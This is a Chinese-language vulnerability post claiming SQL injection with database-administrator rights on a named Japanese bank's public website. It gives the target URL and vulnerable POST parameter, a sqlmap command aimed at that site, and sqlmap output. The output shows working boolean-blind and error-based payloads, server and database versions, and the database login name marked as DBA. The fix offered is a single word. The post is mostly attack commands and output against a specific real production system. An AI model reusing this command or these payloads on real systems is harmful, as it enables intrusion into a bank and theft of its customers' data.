日本東和銀行存在SQL注入(DBA权限)

  • 2022-07-07 22:18:35

Microsoft SQL Server 2012!!!

 

website: http://www.towabank.co.jp/index.asp

python sqlmap.py -u "http://www.towabank.co.jp/index.asp" -p MenuNo --technique=BE  --form --random-agent

 

 

---
Parameter: MenuNo (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
    Payload: MenuNo=(SELECT (CASE WHEN (4746=4746) THEN CHAR(118)+CHAR(87)+CHAR(71)+CHAR(120) ELSE 4746*(SELECT 4746 FROM master..sysdatabases) END))

    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: MenuNo=(CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3061=3061) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113))))
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2012
current user:    'FsolAdmin'
current user is DBA:    True
database management system users [1]:
[*] ##MS_AgentSigningCertificate##

 

解决方案:

过滤

猜你喜欢